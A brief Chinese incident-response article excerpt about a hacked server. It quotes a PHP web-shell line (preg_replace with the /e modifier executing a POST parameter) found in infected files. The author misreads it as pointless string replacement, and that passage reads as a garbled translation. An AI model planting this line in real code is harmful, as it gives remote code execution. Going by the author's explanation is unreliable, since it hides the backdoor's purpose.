惨遭黑客入侵,记一次服务器被攻击的应急行动!(6)
发布时间:2017-10-25 06:20 所属栏目:19 来源:51CTO
导读:你可能注意到了“404-server! !”的标题,利用谷歌搜索的结果可能是其他受感染的服务器: 有更多可疑的文件包含了看似无用的代码: ?php @preg_replace(/[pageerror]/e,$_POST[mkf3wapa],saft); ? 这行替换了字符串
你可能注意到了“404-server! !”的标题,利用谷歌搜索的结果可能是其他受感染的服务器: 有更多可疑的文件包含了看似无用的代码:
这行替换了字符串“saft”中的一个小写字母“saft”中的每一个匹配,并使用 $ _POST 变量 mkf3wapa 的内容。返回值被忽略,因此我不确定该代码片段的用法应该是什么。 (编辑:ASP站长网) |
相关内容
网友评论
推荐文章
热点阅读